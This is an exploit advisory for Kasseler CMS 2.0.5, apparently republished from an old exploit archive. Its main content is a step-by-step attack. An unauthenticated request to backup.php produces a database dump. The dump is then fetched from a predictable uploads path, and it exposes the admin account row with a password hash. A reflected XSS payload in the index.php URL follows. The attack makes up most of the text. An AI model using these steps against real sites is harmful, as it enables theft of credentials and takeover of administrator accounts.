Home / os / win7

Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerabi

Posted on 26 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Kasseler CMS 2.0.5 =&gt; By Pass / Download Backup Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================
Kasseler CMS 2.0.5 =&gt; By Pass / Download Backup Vulnerability
=============================================================

========================================================================================                 
| # Title    : kasseler cms 2.0.5 =&gt; by Pass / Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                                                                                                                                   
| # Dork     : Copyright ©2007-2009 by Kasseler CMS. All rights reserved.                                                                                                               
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)       
| # Bug      : Backup    
                                                             
======================      Exploit By indoushka       =================================
# Exploit  : 
 
1 - http://127.0.0.1/kasseler/backup.php
 
File size: 37.38 KB
Tables processed: 39
Rows processed: 37
 
2 - http://127.0.0.1/uploads/backup/auto_2010-04-27_14-29.sql
 
in lig 645:668 col 1 you found the login information
 
INSERT INTO `kasseler_users` VALUES
(-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, -1, 0, 0, 0, 0, 0, 0, '', 0, 'MBzx97cQMjKQ47tJgil9PBQDr', 1, 0, 0, '0.00', 0, 1, NULL),
(1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N/A', '0000-00-00 00:00:00', 'N/A', 'N/A', '0000-00-00', 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0, NULL, 1, 0, 0, '0.00', 0, 1, NULL);
 
3 - XSS :
 
http://127.0.0.1/index.php?online/&lt;script&gt;alert(213771818860)&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :